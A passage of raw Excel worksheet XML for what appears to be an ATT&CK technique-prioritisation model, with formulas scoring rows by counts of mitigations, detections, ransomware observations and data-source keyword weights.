        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC486" s="29" t="s">
        <v>1757</v>
      </c>
      <c r="AD486" s="25" t="str" cm="1">
        <f t="array" ref="AD486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC486)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE486" s="25">
        <f>IF(AD486="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF486" s="25" t="str" cm="1">
        <f t="array" ref="AF486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC486)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG486" s="25">
        <f>IF(AF486="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH486" s="25" t="str" cm="1">
        <f t="array" ref="AH486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC486)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI486" s="25">
        <f>IF(AH486="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ486" s="25" t="str" cm="1">
        <f t="array" ref="AJ486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC486)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK486" s="25">
        <f>IF(AJ486="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL486" s="25" t="str" cm="1">
        <f t="array" ref="AL486">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC486)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM486" s="25">
        <f>IF(AL486="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN486" s="63"/>
      <c r="AO486" s="51"/>
      <c r="AP486" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ486" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR486" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS486" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT486" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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87" spans="1:47" ht="48">
      <c r="A487" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B487" s="25">
        <f>SUM(H487,M487,V487)*(1+SUM(AE487,AG487,AI487,AK487,AM487))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C487" s="25" t="s">
        <v>1758</v>
      </c>
      <c r="D487" s="25" t="s">
        <v>1759</v>
      </c>
      <c r="E487" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F487" s="51">
        <v>1</v>
      </c>
      <c r="G487" s="51">
        <v>1</v>
      </c>
      <c r="H487" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I487">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J487">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K487">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L487">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M487" s="25">
        <v>0</v>
      </c>
      <c r="N487" s="51">
        <v>0</v>
      </c>
      <c r="O487" s="51">
        <v>0</v>
      </c>
      <c r="P487" s="51">
        <v>0</v>
      </c>
      <c r="Q487" s="51">
        <v>0</v>
      </c>
      <c r="R487" s="51"/>
      <c r="S487" s="51">
        <v>0</v>
      </c>
      <c r="T487" s="51"/>
      <c r="U487" s="51">
        <v>0</v>
      </c>
      <c r="V487" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W487">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X487">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y487">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z487">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA487">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB487">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC487" s="29" t="s">
        <v>1760</v>
      </c>
      <c r="AD487" s="25" t="str" cm="1">
        <f t="array" ref="AD487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC487)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE487" s="25">
        <f>IF(AD487="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF487" s="25" t="str" cm="1">
        <f t="array" ref="AF487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC487)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG487" s="25">
        <f>IF(AF487="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH487" s="25" t="str" cm="1">
        <f t="array" ref="AH487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC487)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI487" s="25">
        <f>IF(AH487="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ487" s="25" t="str" cm="1">
        <f t="array" ref="AJ487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC487)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK487" s="25">
        <f>IF(AJ487="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL487" s="25" t="str" cm="1">
        <f t="array" ref="AL487">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC487)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM487" s="25">
        <f>IF(AL487="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN487" s="51"/>
      <c r="AO487" s="51"/>
      <c r="AP487" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ487" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR487" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS487" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT487" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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88" spans="1:47" ht="63.95">
      <c r="A488" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B488" s="25">
        <f>SUM(H488,M488,V488)*(1+SUM(AE488,AG488,AI488,AK488,AM488))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C488" s="25" t="s">
        <v>1761</v>
      </c>
      <c r="D488" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E488" s="25" t="s">
        <v>1762</v>
      </c>
      <c r="F488" s="51">
        <v>1</v>
      </c>
      <c r="G488" s="51">
        <v>1</v>
      </c>
      <c r="H488" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I488">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J488">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K488">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L488">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M488" s="25">
        <v>0</v>
      </c>
      <c r="N488" s="51">
        <v>0</v>
      </c>
      <c r="O488" s="51">
        <v>0</v>
      </c>
      <c r="P488" s="51">
        <v>0</v>
      </c>
      <c r="Q488" s="51">
        <v>0</v>
      </c>
      <c r="R488" s="51"/>
      <c r="S488" s="51">
        <v>0</v>
      </c>
      <c r="T488" s="52" t="s">
        <v>809</v>
      </c>
      <c r="U488" s="51">
        <v>0</v>
      </c>
      <c r="V488" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W488">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X488">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y488">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z488">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA488">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB488">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC488" s="29" t="s">
        <v>794</v>
      </c>
      <c r="AD488" s="25" t="str" cm="1">
        <f t="array" ref="AD488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC488)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE488" s="25">
        <f>IF(AD488="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF488" s="25" t="str" cm="1">
        <f t="array" ref="AF488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC488)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG488" s="25">
        <f>IF(AF488="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH488" s="25" t="str" cm="1">
        <f t="array" ref="AH488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC488)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI488" s="25">
        <f>IF(AH488="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ488" s="25" t="str" cm="1">
        <f t="array" ref="AJ488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC488)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK488" s="25">
        <f>IF(AJ488="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL488" s="25" t="str" cm="1">
        <f t="array" ref="AL488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC488)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM488" s="25">
        <f>IF(AL488="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN488" s="51"/>
      <c r="AO488" s="51"/>
      <c r="AP488" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ488" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR488" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS488" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT488" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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89" spans="1:47" ht="48">
      <c r="A489" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B489" s="25">
        <f>SUM(H489,M489,V489)*(1+SUM(AE489,AG489,AI489,AK489,AM489))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C489" s="25" t="s">
        <v>1763</v>
      </c>
      <c r="D489" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E489" s="25" t="s">
        <v>1764</v>
      </c>
      <c r="F489" s="51">
        <v>1</v>
      </c>
      <c r="G489" s="51">
        <v>1</v>
      </c>
      <c r="H489" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I489">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J489">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K489">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L489">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M489" s="25">
        <v>0</v>
      </c>
      <c r="N489" s="51">
        <v>0</v>
      </c>
      <c r="O489" s="51">
        <v>0</v>
      </c>
      <c r="P489" s="51">
        <v>0</v>
      </c>
      <c r="Q489" s="51">
        <v>0</v>
      </c>
      <c r="R489" s="51"/>
      <c r="S489" s="51">
        <v>0</v>
      </c>
      <c r="T489" s="52" t="s">
        <v>809</v>
      </c>
      <c r="U489" s="51">
        <v>0</v>
      </c>
      <c r="V489" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W489">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X489">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y489">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z489">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA489">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB489">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC489" s="29" t="s">
        <v>1765</v>
      </c>
      <c r="AD489" s="25" t="str" cm="1">
        <f t="array" ref="AD489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC489)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE489" s="25">
        <f>IF(AD489="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF489" s="25" t="str" cm="1">
        <f t="array" ref="AF489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC489)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG489" s="25">
        <f>IF(AF489="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH489" s="25" t="str" cm="1">
        <f t="array" ref="AH489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC489)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI489" s="25">
        <f>IF(AH489="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ489" s="25" t="str" cm="1">
        <f t="array" ref="AJ489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC489)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK489" s="25">
        <f>IF(AJ489="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL489" s="25" t="str" cm="1">
        <f t="array" ref="AL489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC489)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM489" s="25">
        <f>IF(AL489="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN489" s="51"/>
      <c r="AO489" s="51"/>
      <c r="AP489" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ489" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR489" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS489" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT489" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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90" spans="1:47" ht="32.1">
      <c r="A490" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B490" s="25">
        <f>SUM(H490,M490,V490)*(1+SUM(AE490,AG490,AI490,AK490,AM490))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C490" s="25" t="s">
        <v>1766</v>
      </c>
      <c r="D490" s="25" t="s">
        <v>348</v>
      </c>
      <c r="E490" s="25" t="s">
        <v>1767</v>
      </c>
      <c r="F490" s="51">
        <v>1</v>
      </c>
      <c r="G490" s="51">
        <v>1</v>
      </c>
      <c r="H490" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I490">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J490">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K490">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L490">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M490" s="25">
        <v>0</v>
      </c>
      <c r="N490" s="51">
        <v>0</v>
      </c>
      <c r="O490" s="51">
        <v>0</v>
      </c>
      <c r="P490" s="51">
        <v>0</v>
      </c>
      <c r="Q490" s="51">
        <v>0</v>
      </c>
      <c r="R490" s="51"/>
      <c r="S490" s="51">
        <v>0</v>
      </c>
      <c r="T490" s="52" t="s">
        <v>1768</v>
      </c>
      <c r="U490" s="51">
        <v>0</v>
      </c>
      <c r="V490" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W490">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X490">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y490">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z490">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA490">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB490">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC490" s="29" t="s">
        <v>1144</v>
      </c>
      <c r="AD490" s="25" t="str" cm="1">
        <f t="array" ref="AD490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC490)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE490" s="25">
        <f>IF(AD490="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF490" s="25" t="str" cm="1">
        <f t="array" ref="AF490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC490)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG490" s="25">
        <f>IF(AF490="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH490" s="25" t="str" cm="1">
        <f t="array" ref="AH490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC490)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI490" s="25">
        <f>IF(AH490="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ490" s="25" t="str" cm="1">
        <f t="array" ref="AJ490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC490)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK490" s="25">
        <f>IF(AJ490="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL490" s="25" t="str" cm="1">
        <f t="array" ref="AL490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC490)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM490" s="25">
        <f>IF(AL490="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN490" s="51"/>
      <c r="AO490" s="51"/>
      <c r="AP490" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ490" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
